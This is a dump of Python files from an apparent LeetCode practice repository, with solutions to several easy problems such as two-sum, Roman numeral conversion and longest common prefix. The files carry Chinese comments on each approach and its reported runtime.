[ { "alpha_fraction": 0.5346432328224182, "alphanum_fraction": 0.5646328926086426, "avg_line_length": 20.977272033691406, "blob_id": "536e263743e25eb86f86b2cb679e41161930fc98", "content_id": "b5f00b3bfc90d057c074e584db79c9255a738190", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1275, "license_type": "no_license", "max_line_length": 52, "num_lines": 44, "path": "/Question_14/Answer_2.py", "repo_name": "WangMingJue/LeetCode", "src_encoding": "UTF-8", "text": "\"\"\"\n1. 先判断strs的个数,如果为0,则返回“”;如果为1,则返回那个元素\n2. 对strs列表进行排序,方便相同字符串的顺序\n3. 对strs列表进行for循环\n4. 设置一个junge_str,这是想要匹配的前缀,初始为第一个元素本身,随着循环不断去除最后一个字符\n5. 然后再用junge_str对整个sts进行循环,如果junge_str不匹配某个元素,就进行下一轮\n\"\"\"\n\n\ndef get_is_same(self, junge_str, strs):\n for other in strs:\n try:\n if other.index(junge_str) != 0:\n return False\n except:\n return False\n return True\n\n\ndef longestCommonPrefix(self, strs):\n str_len = len(strs)\n if str_len == 0:\n return \"\"\n if str_len == 1:\n return strs[0]\n strs.sort()\n str_len = len(strs[0])\n junge_str = \"\"\n for i in range(str_len):\n junge_str = strs[0][:(-1) * i]\n if i == 0:\n junge_str = strs[0]\n if self.get_is_same(junge_str, strs):\n break\n else:\n junge_str = \"\"\n continue\n return junge_str\n\n\n\"\"\"\n执行用时:32 ms, 在所有 Python3 提交中击败了98%的用户\n内存消耗:14.7 MB, 在所有 Python3 提交中击败了98.03%的用户\n\"\"\"\n" }, { "alpha_fraction": 0.5277161598205566, "alphanum_fraction": 0.6363636255264282, "avg_line_length": 17.040000915527344, "blob_id": "d90df86a1e1ee930911cd8eabedd11d7f7f04856", "content_id": "79a22c01c4d7d96732720f1c3635efd62b34dab5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 735, "license_type": "no_license", "max_line_length": 51, "num_lines": 25, "path": "/Question_7/Answer_1.py", "repo_name": "WangMingJue/LeetCode", "src_encoding": "UTF-8", "text": "\"\"\"\n1. 先使用sign来存储x的正负符号,如果为负,则进行绝对值处理\n2. 将x转化为字符串类型,再转化成列表类型\n3. 然后反转列表,再转化成字符串类型,再转化成数字类型\n4. 最后乘以正负符号\n5. 判断反转后的数字是不是在[−2的31次方, 2的31次方 − 1]中,不在返回0,在的话返回x\n\"\"\"\nx = 1534236469\n\nsign = 1\nif x < 0:\n sign = -1\n x = abs(x)\ntmp = list(str(x))\ntmp.reverse()\ntmp = int(\"\".join(tmp))\ntmp = tmp * sign\nif tmp < -2 ** 31 or tmp > 2 ** 31 - 1:\n print(0)\nprint(tmp)\n\n\"\"\"\n执行用时:40 ms, 在所有 Python3 提交中击败了77.68%的用户\n内存消耗:14.9 MB, 在所有 Python3 提交中击败了41.74%的用户\n\"\"\"\n" }, { "alpha_fraction": 0.5635592937469482, "alphanum_fraction": 0.6228813529014587, "avg_line_length": 21.4761905670166, "blob_id": "5d6f702b4ddddaf848c384ea7ac657037a1d3d5b", "content_id": "796a86ba28dc52a07bd6b125541a9cf85017db70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 654, "license_type": "no_license", "max_line_length": 53, "num_lines": 21, "path": "/Question_1/Answer_3.py", "repo_name": "WangMingJue/LeetCode", "src_encoding": "UTF-8", "text": "\"\"\"\n1. 使用map函数,依次使用Target减去每个元素,得到一个差值列表A\n2. 循环差值列表A\n3. 获取第i个原值的位置\n4. 
Then find the position of the difference A inside the sublist nums[i+1:]\n\"\"\"\nnums = [3, 2, 4, 5, 5]\ntarget = 10\n\nfor i in map(lambda x: target - x, nums):\n    try:\n        start_index = nums.index(target - i)\n        end_index = nums[start_index + 1:].index(i)\n        print([start_index, end_index+start_index+1])\n        break\n    except:\n        continue\n\"\"\"\nRuntime: 852 ms, beating 5.00% of all Python3 submissions\nMemory: 15 MB, beating 24.23% of all Python3 submissions\n\"\"\"\n" }, { "alpha_fraction": 0.669767439365387, "alphanum_fraction": 0.6825581192970276, "avg_line_length": 32.07692337036133, "blob_id": "5863b2921a46cf368619c1ffa3075eb957b865d0", "content_id": "dab9ef2f255eda93843eda0b39a449a3b8482c70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1080, "license_type": "no_license", "max_line_length": 93, "num_lines": 26, "path": "/CreateQuestionFolder.py", "repo_name": "WangMingJue/LeetCode", "src_encoding": "UTF-8", "text": "\"\"\"\nTemplate for creating the question folders\n1. Question folder: Question\n2. Answer file: Answer.py\n3. Question description: description.txt\n\"\"\"\nimport os\n\n# Number of question folders to create; the figure comes from the LeetCode site\nQuestion_numbers = 1800\n\n# Start creating\nfor i in range(1, Question_numbers + 1):  # loop starting from 1\n    current_question_folder = \"./Question_{}\".format(i)  # folder path\n    if not os.path.exists(current_question_folder):  # create the folder only if it is missing\n        os.mkdir(current_question_folder)\n\n    question_answer_file = \"./{}/Answer_1.py\".format(current_question_folder)  # answer file path\n    if not os.path.exists(question_answer_file):  # create the file only if it is missing\n        answer_file = open(question_answer_file, \"w\")\n        answer_file.close()\n\n    question_description = \"./{}/description.txt\".format(current_question_folder)  # description file path\n    if not os.path.exists(question_description):  # create the file only if it is missing\n        answer_file = open(question_description, \"w\")\n        answer_file.close()\n" }, { "alpha_fraction": 0.5727923512458801, "alphanum_fraction": 0.6443914175033569, "avg_line_length": 22.052631378173828, "blob_id": "a34e94212f13d96e498764925050794167c617d6", "content_id": "6f66c3a395eb7d94dfa6abbb9aafa4ff2081db64", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 675, "license_type": "no_license", "max_line_length": 47, "num_lines": 19, "path": "/Question_1/Answer_2.py", "repo_name": "WangMingJue/LeetCode", "src_encoding": "UTF-8", "text": "\"\"\"\n1. Loop over nums, take the i-th element and subtract it from target to get the difference A\n2. Slice nums to get nums[i+1:], the sublist after the i-th element\n3. Use the in operator to check whether A is in that sublist; if not, go straight to the next iteration\n4. If it is in the sublist, return right away\n\"\"\"\nnums = [2, 7, 11, 15]\ntarget = 9\n\nfor i in range(len(nums)):\n    tmp = target - nums[i]\n    if tmp not in nums[i + 1:]:\n        continue\n    print([i, nums[i + 1:].index(tmp) + i + 1])\n\n\"\"\"\nRuntime: 484 ms, beating 5.00% of all Python3 submissions\nMemory: 14.8 MB, beating 85.64% of all Python3 submissions\n\"\"\"\n" }, { "alpha_fraction": 0.5377026200294495, "alphanum_fraction": 0.5870330929756165, "avg_line_length": 31.272727966308594, "blob_id": "e7e88bf1009e2b6604fa194eede991d2bf221071", "content_id": "63006d53e1759dabc0051048434360cb6578f6a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1737, "license_type": "no_license", "max_line_length": 94, "num_lines": 44, "path": "/Question_13/Answer_1.py", "repo_name": "WangMingJue/LeetCode", "src_encoding": "UTF-8", "text": "\"\"\"\n1. First set up a dict that maps each Roman numeral to its decimal value\n2. Convert every letter of the string s to its number, forming a numeric list result_list\n3. Loop over result_list\n4. Check whether the i-th element is smaller than the (i+1)-th; if so, add (next minus current) to result and advance the index (pointer) by 2\n5. 
Otherwise add the i-th element straight to result and advance index by 1\n\"\"\"\ns = \"MCMXCIV\"\n\nroma_dict = {\"I\": 1, \"V\": 5, \"X\": 10, \"L\": 50, \"C\": 100, \"D\": 500, \"M\": 1000}\nresult_list = list(map(lambda x: roma_dict[x], s))\nresult_list_length = len(result_list)\nresult = 0\nindex = 0\nwhile index < result_list_length:\n    if index + 1 < result_list_length and result_list[index] < result_list[index + 1]:\n        result += (result_list[index + 1] - result_list[index])\n        index += 2\n    else:\n        result += result_list[index]\n        index += 1\nprint(result)\n\n\"\"\"\nRuntime: 44 ms, beating 97.84% of all Python3 submissions\nMemory: 14.7 MB, beating 95.35% of all Python3 submissions\n\"\"\"\n\"\"\"\nroma_dict = {\"I\": 1, \"V\": 5, \"X\": 10, \"L\": 50, \"C\": 100, \"D\": 500, \"M\": 1000}\nclass Solution:\n    def romanToInt(self, s: str) -> int:\n        result_list = list(map(lambda x: roma_dict[x], s))\n        result_list_length = len(result_list)\n        result = 0\n        index = 0\n        while index < result_list_length:\n            if index + 1 < result_list_length and result_list[index] < result_list[index + 1]:\n                result += (result_list[index + 1] - result_list[index])\n                index += 2\n            else:\n                result += result_list[index]\n                index += 1\n        return result\n\"\"\"" }, { "alpha_fraction": 0.5211267471313477, "alphanum_fraction": 0.579812228679657, "avg_line_length": 20.299999237060547, "blob_id": "3ef03e93f5af26e6c2194aac3545f5ca6a8cb59c", "content_id": "0f9f10f5098cfd510acddde2a6be91f679c16687", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 648, "license_type": "no_license", "max_line_length": 45, "num_lines": 20, "path": "/Question_1/Answer_1.py", "repo_name": "WangMingJue/LeetCode", "src_encoding": "UTF-8", "text": "\"\"\"\nUse two nested loops:\n1. Outer loop: take the i-th element and subtract it from target to get the difference A\n2. Inner loop: search the list after the i-th element for the difference A; if it is there, that is the pair we want\n\"\"\"\nnums = [2, 7, 11, 15]\ntarget = 9\n\nfor i in range(len(nums)):\n    tmp = target - nums[i]\n    for j in range(i + 1, len(nums)):\n        if nums[j] == tmp:\n            print([i, j])\n            break\n        else:\n            continue\n\"\"\"\nRuntime: 2296 ms, beating 5.07% of all Python3 submissions\nMemory: 15.1 MB, beating 5.09% of all Python3 submissions\n\"\"\"\n" }, { "alpha_fraction": 0.5942028760910034, "alphanum_fraction": 0.6753623485565186, "avg_line_length": 15.428571701049805, "blob_id": "d133d10efcf6e6e9cc506b05df5d39e9cb496909", "content_id": "03d8ed598de4f25ca997f11610f209d9640963da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 561, "license_type": "no_license", "max_line_length": 39, "num_lines": 21, "path": "/Question_9/Answer_1.py", "repo_name": "WangMingJue/LeetCode", "src_encoding": "UTF-8", "text": "\"\"\"\n1. First check whether x is negative; if so, the answer is immediately False\n2. Convert x to a string, then to a list\n3. Reverse the list and convert it back to a number\n4. 
If the reversed number equals x, the answer is True, otherwise False\n\"\"\"\nx = 1534236469\n\nif x < 0:\n    print(False)\nelse:\n    tmp = list(str(x))\n    tmp.reverse()\n    tmp = int(\"\".join(tmp))\n    print(tmp == x)\n\n\"\"\"\nRuntime: 68 ms, beating 82.36% of all Python3 submissions\nMemory: 15 MB, beating 5.32% of all Python3 submissions\n\"\"\"\n" }, { "alpha_fraction": 0.4545454680919647, "alphanum_fraction": 0.5454545617103577, "avg_line_length": 8, "blob_id": "4078b8cb875addd8ad55de28715c78d289049964", "content_id": "81cc94e553eeafb887f6f69b43d9de877a4b60d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 70, "license_type": "no_license", "max_line_length": 13, "num_lines": 5, "path": "/Test.py", "repo_name": "WangMingJue/LeetCode", "src_encoding": "UTF-8", "text": "\"\"\"\nA scratch file for quick code experiments\n\"\"\"\ns = \"123\"\nprint(s[:0])" }, { "alpha_fraction": 0.6183205842971802, "alphanum_fraction": 0.6641221642494202, "avg_line_length": 23.952381134033203, "blob_id": "c589b94492b29fbb09776c59035e38adf7bae1e6", "content_id": "5706219d097628c758219786a40a6a7dcb52e5eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 814, "license_type": "no_license", "max_line_length": 53, "num_lines": 21, "path": "/Question_1/Answer_4.py", "repo_name": "WangMingJue/LeetCode", "src_encoding": "UTF-8", "text": "\"\"\"\n1. First turn the nums list into a dict tmp_dict with [element value] as key and [element index] as value\n2. Loop over nums and work out the difference A for the i-th element\n3. If A is among the keys of tmp_dict and its stored index differs from the current one, we have the answer\nNote: the large drop in runtime comes from dict lookups being far faster than list lookups\n\"\"\"\nnums = [3, 2, 4, 5, 5]\ntarget = 10\n\ntmp_dict = {}\nfor index, value in enumerate(nums):\n    tmp_dict[value] = index\nfor i in range(len(nums)):\n    tmp = target - nums[i]\n    if tmp in tmp_dict.keys() and tmp_dict[tmp] != i:\n        print([i, tmp_dict[tmp]])\n        break\n\"\"\"\nRuntime: 44 ms, beating 43.19% of all Python3 submissions\nMemory: 15.9 MB, beating 5.18% of all Python3 submissions\n\"\"\"\n" }, { "alpha_fraction": 0.5589622855186462, "alphanum_fraction": 0.6179245114326477, "avg_line_length": 21.3157901763916, "blob_id": "82f13f31ce57d04ff6818a5f37bbca24fa80bff0", "content_id": "92fbef7af50a91228f4ea13290365faaf7edb5ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 580, "license_type": "no_license", "max_line_length": 53, "num_lines": 19, "path": "/Question_1/Answer_5.py", "repo_name": "WangMingJue/LeetCode", "src_encoding": "UTF-8", "text": "\"\"\"\nThe only difference from Answer 4 is that the dict is built from the second element of the list onward\nNote: the runtime varies between runs; run it a few times and it can hit 40 ms\n\"\"\"\nnums = [3, 2, 4, 5, 5]\ntarget = 6\n\ntmp_dict = {}\nfor index, value in enumerate(nums[1:]):\n    tmp_dict[value] = index+1\nfor i in range(len(nums)):\n    tmp = target - nums[i]\n    if tmp in tmp_dict.keys() and tmp_dict[tmp] != i:\n        print([i, tmp_dict[tmp]])\n        break\n\"\"\"\nRuntime: 40 ms, beating 67.58% of all Python3 submissions\nMemory: 15.9 MB, beating 5.18% of all Python3 submissions\n\"\"\"\n" }, { "alpha_fraction": 0.5963401794433594, "alphanum_fraction": 0.631862223148346, "avg_line_length": 26.323530197143555, "blob_id": "07e4c6a80c340de3994aa0d867732c0a0b2d57ad", "content_id": "0d25ba6dc12a84800dce5b3a8c4949de02fb4c34", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1301, "license_type": "no_license", "max_line_length": 59, "num_lines": 34, "path": "/Question_14/Answer_1.py", "repo_name": "WangMingJue/LeetCode", "src_encoding": "UTF-8", "text": "\"\"\"\n1. First check how many elements strs has: if 0, return \"\"; if 1, return that element; if \"\" is in the list, also return \"\"\n2. Keep prefix_length, the length of the prefix matched so far, defaulting to 1\n3. Take the first element as the baseline for a while loop that runs while prefix_length does not exceed its length\n4. 
Then run a for loop over strs; if the current prefix matches every element, bump prefix_length by 1 and match again\n5. If the match fails on some element, return the prefix that passed the previous round\n\"\"\"\nstrs = [\"abca\", \"aba\", \"aaab\"]\ndef longestCommonPrefix(strs):\n    strs_length = len(strs)\n    if strs_length == 0 or \"\" in strs:\n        return \"\"\n    if strs_length == 1:\n        return strs[0]\n\n    prefix_length = 1\n    result = strs[0][:prefix_length]\n    while prefix_length <= len(strs[0]):\n        for i in strs[1:]:\n            if result in i and result == i[:prefix_length]:\n                pass\n            else:\n                return result[:prefix_length - 1]\n        prefix_length += 1\n        result = strs[0][:prefix_length]\n    return result\n\n\nprint(longestCommonPrefix(strs))\n\n\"\"\"\nRuntime: 36 ms, beating 90.73% of all Python3 submissions\nMemory: 15 MB, beating 18.00% of all Python3 submissions\n\"\"\"\n" } ]
12
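The Answer_4/Answer_5 files in the record above owe their speedup to O(1) dict lookups. As a quick illustration, here is a stand-alone, single-pass variant of the same idea; the function name `two_sum` and the one-pass structure are my own packaging, not code from the repo:

```python
def two_sum(nums, target):
    seen = {}                      # value -> index of an element already visited
    for i, v in enumerate(nums):
        if target - v in seen:     # O(1) dict lookup instead of list.index()
            return [seen[target - v], i]
        seen[v] = i                # record only after checking, so i != j
    return []

# quick checks against the example inputs used in the answers above
assert two_sum([2, 7, 11, 15], 9) == [0, 1]
assert two_sum([3, 2, 4, 5, 5], 10) == [3, 4]
```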
thomasd57/calsync
https://github.com/thomasd57/calsync
49dbeb4749795d3814a9234a3fe2e212a3349646
0910c5a951be2ad62de0ff66e672c2721113a4cc
8da38e9ffc666d7af7c346bcfc8ad3e46b1a4575
refs/heads/master
2020-03-09T08:34:01.542289
2018-06-05T00:23:19
2018-06-05T00:23:19
128,692,267
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5011127591133118, "alphanum_fraction": 0.5315281748771667, "avg_line_length": 39.84848403930664, "blob_id": "467bfc6eafa8131391d6103db8d6ecb53a3f9426", "content_id": "c10a9b5d6ec4cc738eee9720c5d237ba64872f77", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2696, "license_type": "no_license", "max_line_length": 193, "num_lines": 66, "path": "/sm_event.py", "repo_name": "thomasd57/calsync", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport re\nfrom datetime import datetime\n\nclass SMEvent:\n fields = ('who', 'start', 'end', 'resource', 'comment', 'email', 'mobile', 'error')\n def __init__(self):\n for name in self.fields:\n setattr(self, name, None)\n\n ''' Create event from Schedule Master string'''\n @classmethod\n def from_sm(cls, event_string):\n prefix_start = 'Strt: '\n prefix_end = 'End: '\n prefix_resource = 'Lesson: '\n prefix_comment = 'Comment:'\n prefix_mobile = 'mobile: '\n re_mobile = re.compile(r'[\\d-]+')\n re_email = re.compile(r'[\\w.-]+@[\\w.-]+')\n event = cls()\n try:\n event_string = re.sub(r'^ddrivetip\\(\\'', '', event_string)\n event_string = re.sub(r'\\',\\d+\\);\\s*$', '', event_string)\n event_list = event_string.split('<br>')\n event.who = event_list.pop(0)\n for el in event_list:\n if el[:len(prefix_start)] == prefix_start:\n event.start = event.decode_date(el[len(prefix_start):])\n elif el[:len(prefix_end)] == prefix_end:\n event.end = event.decode_date(el[len(prefix_end):])\n elif el[:len(prefix_resource)] == prefix_resource:\n event.resource = el[len(prefix_resource):]\n elif re.match(re_email, el):\n event.email = el.strip()\n elif el[:len(prefix_comment)] == prefix_comment:\n event.comment = el[len(prefix_comment):]\n elif el[:len(prefix_mobile)] == prefix_mobile and re.match(re_mobile, el[len(prefix_mobile):]):\n event.mobile = el[len(prefix_mobile):]\n except Exception as ex:\n event.error = ex\n return event\n\n @staticmethod\n def decode_date(date_string):\n fmt = '%a %m/%d/%y %H:%M'\n return datetime.strptime(date_string, fmt)\n\n def __str__(self):\n rep = []\n for field in self.fields:\n value = getattr(self, field)\n if value is not None:\n rep.append('{}: {}'.format(field, value))\n return '\\n'.join(rep)\n \nif __name__ == '__main__':\n events = ['''ddrivetip('Fang, Gan <br>Strt: Sun 04/08/18 09:30<br>End: Sun 04/08/18 12:00<br>Lesson: 122DZ<br>Local<br>[email protected] <br>mobile: 614-886-4354<br>Comment:Club & SR20 Initial',250);'''\n,\n'''ddrivetip('Daniel, Thomas <br>Strt: Sun 04/08/18 13:00<br>End: Sun 04/08/18 18:00<br>[email protected] <br>hm: 65-529-3078 <br>mobile: 650-279-3429',250);''' ]\n\n import pdb\n # pdb.set_trace()\n for event_string in events:\n event = Event().from_sm(event_string)\n print(event, '\\n')\n" }, { "alpha_fraction": 0.53515625, "alphanum_fraction": 0.5390625, "avg_line_length": 28.538461685180664, "blob_id": "f4f7ca2a9e139d2613b3861993e740d96db777ed", "content_id": "e39c6e3058947ed1bedcfef7cba12aec4bc6a453", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 768, "license_type": "no_license", "max_line_length": 107, "num_lines": 26, "path": "/event.py", "repo_name": "thomasd57/calsync", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nfrom datetime import datetime\n\nclass Event:\n def __init__(self, start = None, end = None, customer = None, resource = None):\n self.start = start\n self.end = end\n self.customer = customer\n self.resource = resource\n\n 
@staticmethod\n    def dt_from_str(dt):\n        dt = datetime.strptime(dt[:16], '%Y-%m-%dT%H:%M')\n        return dt\n\n    def push_time(self, tm):\n        dt = self.dt_from_str(tm)\n        if self.start:\n            if self.end:\n                raise Exception(\"push time beyond end (\" + tm + \")\")\n            self.end = dt\n        else:\n            self.start = dt\n\n    def __str__(self):\n        return ','.join([str(self.start), str(self.end), '|'.join(self.customer), '|'.join(self.resource)])\n" }, { "alpha_fraction": 0.6410788297653198, "alphanum_fraction": 0.6452282071113586, "avg_line_length": 31.133333206176758, "blob_id": "12471b472df352687a31a324c6d05c0cde54138d", "content_id": "f1139a80946133f70453ceebbca2cd9d10a5702f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 482, "license_type": "no_license", "max_line_length": 58, "num_lines": 15, "path": "/browser.py", "repo_name": "thomasd57/calsync", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\nclass Browser:\n    def __init__(self, url = None, headless = True):\n        options = webdriver.firefox.options.Options()\n        if headless:\n            options.set_headless()\n        self.driver = webdriver.Firefox(options = options)\n        self.driver.implicitly_wait(10)\n        if url is not None:\n            self.driver.get(url)\n\n    def get_html(self):\n        return self.driver.page_source\n" }, { "alpha_fraction": 0.5774465203285217, "alphanum_fraction": 0.5784186720848083, "avg_line_length": 36.63414764404297, "blob_id": "108d2ae3cd5f8759e086241274c11c7de08b3151", "content_id": "7c1ef93543d4f1b943cdadf90f05be904a7cd0d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3086, "license_type": "no_license", "max_line_length": 136, "num_lines": 82, "path": "/flight_schedule.py", "repo_name": "thomasd57/calsync", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\nimport time\nimport logging\nfrom selenium.webdriver.support.ui import Select\nfrom bs4 import BeautifulSoup\n\nimport browser\nfrom event import Event\n\nclass FlightSchedule(browser.Browser):\n    attr_table = { 'reservation | reservationListResourceDisplayFilter' : 'resource',\n                   'reservation | reservationListCustomerDisplayFilter:operator' : 'customer',\n    }\n    def __init__(self, headless = True):\n        self.userid = os.environ['FS_USERID']\n        self.password = os.environ['FS_PASSWORD']\n        self.schedule = []\n        super().__init__(\"https://app.flightschedulepro.com/Account/Login\", headless = headless)\n        self.logger = logging.getLogger(__name__)\n        self.logger.info('fetched login page')\n\n    def login(self):\n        userid = self.driver.find_element_by_id('username')\n        userid.send_keys(self.userid)\n        password = self.driver.find_element_by_id('password')\n        password.send_keys(self.password)\n        submit = self.driver.find_element_by_tag_name('button')\n        submit.click()\n        self.logger.info('login successful')\n        time.sleep(3)\n\n    def get_schedule(self):\n        self.driver.get('https://app.flightschedulepro.com/App/Reservations/')\n        time.sleep(5)\n        events = []\n        soup = BeautifulSoup(self.get_html(), 'html.parser')\n        table = soup.find('table').find('tbody')\n        for row in table.find_all('tr'):\n            event = Event()\n            for cell in row.find_all('td'):\n                for times in cell.find_all('time'):\n                    try:\n                        event.push_time(times['datetime'])\n                    except KeyError:\n                        pass\n                try:\n                    attr = self.attr_table[cell['ng-bind-html']]\n                    if cell.string:\n                        value = [cell.string]\n                    else:\n                        value = list(cell.strings)\n                    setattr(event, attr, value)\n                except KeyError:\n                    pass\n            events.append(event)\n        return 
events\n\nif __name__ == '__main__':\n    import time\n    import argparse\n    import json\n    import logging\n    parser = argparse.ArgumentParser(description = 'Access Flight Schedule Pro')\n    parser.add_argument('-v', '--view', help = 'See browser window, by default headless', action = 'store_true')\n    parser.add_argument('-e', '--event', help = 'Create new events from json file')\n    parser.add_argument('-l', '--log_level', help = 'logging level', choices = ('DEBUG', 'INFO', 'WARNING', 'ERROR'), default = 'ERROR')\n    args = parser.parse_args()\n    logging.basicConfig(format = '%(levelname)s: %(message)s', level = getattr(logging, args.log_level))\n    events = []\n    if args.event:\n        events = json.load(open(args.event))\n    driver = FlightSchedule(not args.view)\n    driver.login()\n\n    #for event in events:\n    #    driver.store_event(event)\n    for event in driver.get_schedule():\n        print(event, '\\n')\n    if not args.view:\n        driver.driver.close()\n" }, { "alpha_fraction": 0.6182413697242737, "alphanum_fraction": 0.6250682473182678, "avg_line_length": 44.209877014160156, "blob_id": "a17b002ffeac99484f15af2d302b95a9d11a140f", "content_id": "186b0eb59729f4add8694cfbfb42ef1aab9516cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3662, "license_type": "no_license", "max_line_length": 136, "num_lines": 81, "path": "/schedule_master.py", "repo_name": "thomasd57/calsync", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\nimport logging\nfrom selenium.webdriver.support.ui import Select\n\nimport browser\nimport sm_event\n\nclass ScheduleMaster(browser.Browser):\n    def __init__(self, headless = True):\n        self.userid = os.environ['SM_USERID']\n        self.password = os.environ['SM_PASSWORD']\n        self.schedule = []\n        super().__init__(\"https://my.schedulemaster.com\", headless = headless)\n        self.logger = logging.getLogger(__name__)\n        self.logger.info('fetched login page')\n\n    def login(self):\n        for form in self.driver.find_elements_by_tag_name('form'):\n            if form.get_attribute('action').split('/')[-1] == 'login.asp':\n                userid = form.find_element_by_name('USERID')\n                userid.send_keys(self.userid)\n                password = form.find_element_by_name('DATA')\n                password.send_keys(self.password)\n                form.submit()\n        # switch to iframe\n        self.driver.get(self.driver.find_element_by_id('asp_legacy').get_attribute('src'))\n        self.userid = self.driver.find_element_by_name('USERID').get_attribute('value')\n        self.session = self.driver.find_element_by_name('SESSION').get_attribute('value')\n        self.schedule = self.driver.find_element_by_id('res_table2')\n        self.username = self.schedule.find_element_by_class_name('InactiveLink').text.split(',')[0]\n        self.logger.info('login successful')\n    \n    def get_schedule(self):\n        schedule = []\n        for button in self.schedule.find_elements_by_tag_name('button'):\n            attr = button.get_attribute('onMouseOver')\n            if attr is not None:\n                schedule.append(sm_event.SMEvent.from_sm(attr))\n        self.logger.info('fetched current schedule')\n        return schedule\n\n    def store_event(self, event):\n        url = ['https://my.schedulemaster.com/schedlesson.aspx?WINDOW=YES']\n        url.append('N_NO={}'.format(self.username))\n        url.append('USERID={}'.format(self.userid))\n        url.append('SESSION={}'.format(self.session))\n        self.driver.get('&'.join(url))\n        self.fill_date('ctl00_CPL1_dt_StartDate2', 'ctl00_CPL1_ddl_StartTime2', event.start)\n        self.fill_date('ctl00_CPL1_dt_EndDate2', 'ctl00_CPL1_ddl_EndTime2', event.end)\n        self.driver.find_element_by_name('ctl00$CPL1$btnMakeSched').click()\n        self.logger.info('stored 
event\\n{}'.format(event))\n\n def fill_date(self, id_date, id_time, value):\n date = self.driver.find_element_by_id(id_date)\n date.clear()\n date.send_keys('{}/{}/{}'.format(value.month, value.day, value.year))\n time = Select(self.driver.find_element_by_id(id_time))\n time.select_by_index(value.hour * 2 + int(value.minute / 30))\n\n\nif __name__ == '__main__':\n import argparse\n import json\n import logging\n parser = argparse.ArgumentParser(description = 'Access Schedule Master')\n parser.add_argument('-v', '--view', help = 'See browser window, by default headless', action = 'store_true')\n parser.add_argument('-e', '--event', help = 'Create new events from json file')\n parser.add_argument('-l', '--log_level', help = 'logging level', choices = ('DEBUG', 'INFO', 'WARNING', 'ERROR'), default = 'ERROR')\n args = parser.parse_args()\n logging.basicConfig(format = '%(levelname)s: %(message)s', level = getattr(logging, args.log_level))\n events = []\n if args.event:\n events = json.load(open(args.event))\n driver = ScheduleMaster(not args.view)\n driver.login()\n for event in events:\n driver.store_event(event)\n for event in driver.get_schedule():\n print(event, '\\n')\n driver.driver.close()\n" } ]
5
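A quick sanity check of `Event.push_time` from the calsync record above, run from the repo root so `event` is importable; the customer and resource values are illustrative, not data from the repo:

```python
from event import Event

e = Event(customer=["Daniel, Thomas"], resource=["N122DZ"])  # illustrative values
e.push_time("2018-04-08T13:00:00-07:00")  # only the first 16 chars are parsed; sets start
e.push_time("2018-04-08T18:00:00-07:00")  # second call fills in the end time
print(e)  # -> 2018-04-08 13:00:00,2018-04-08 18:00:00,Daniel, Thomas,N122DZ

try:
    e.push_time("2018-04-08T19:00:00-07:00")  # a third call must raise
except Exception as ex:
    print(ex)  # "push time beyond end (...)"
```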
Aman6744/project_backup_words
https://github.com/Aman6744/project_backup_words
3fded0bfd6c17dad91fbc669cde9fa2328e6745d
1fc2b6039c50f8fb08d394f5a68a5355d8bd3cd5
a620e82bf31937495933950e5ed828f420a3ada1
refs/heads/master
2023-03-09T09:27:04.833695
2021-02-20T10:00:47
2021-02-20T10:00:47
339,674,812
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4907229542732239, "alphanum_fraction": 0.5013862252235413, "avg_line_length": 36.50400161743164, "blob_id": "2f6b3618ec1957d0b7e8e6dc6f54eedf25b180a1", "content_id": "c7fd37e952063106a0d687cb0d4bd864a67c0e7a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4689, "license_type": "no_license", "max_line_length": 136, "num_lines": 125, "path": "/src/data/generator_shuffle.py", "repo_name": "Aman6744/project_backup_words", "src_encoding": "UTF-8", "text": "import h5py\nimport string\nimport numpy as np\nimport tensorflow as tf\n\nimport Preprocess_image as pp\nfrom data.tokenizer import Tokenizer\n\nclass Datagenerator(tf.keras.utils.Sequence):\n def __init__(self, source_path, charset, partition, batch_size=32, maxTextLength, buf_size=0):\n self.maxTextLength = maxTextLength\n self.tokenizer = Tokenizer(\n filters=string.printable.translate(\n str.maketrans(\"\", \"\", charset)\n ), \n charset=charset\n )\n # self.tokenizer.fit_on_texts(charset)\n self.batch_size = batch_size\n self.partition = partition\n self.dataset = h5py.File(source_path, 'r')[self.partition]\n self.size = self.dataset['label'].shape[0]\n self.steps = int(np.ceil(self.size/self.batch_size))\n self.buf_size = buf_size\n # if self.partition in ['train'] and self.buf_size:\n # self.img_buf = self.dataset['image'][0:self.buf_size]\n # self.lab_buf = self.dataset['label'][0:self.buf_size]\n\n # for p in self.partitions:\n # self.size[p] = self.dataset[p]['image'].shape[0]\n # self.steps[p] = int(np.ceil(self.size[p]/self.batch_size))\n # self.index[p] = 0\n\n\n def __len__(self):\n return self.steps\n \n def __getitem__(self, idx):\n if self.partition in ['valid', 'test'] or not self.buf_size:\n index = idx*self.batch_size\n until = index+self.batch_size\n\n x = 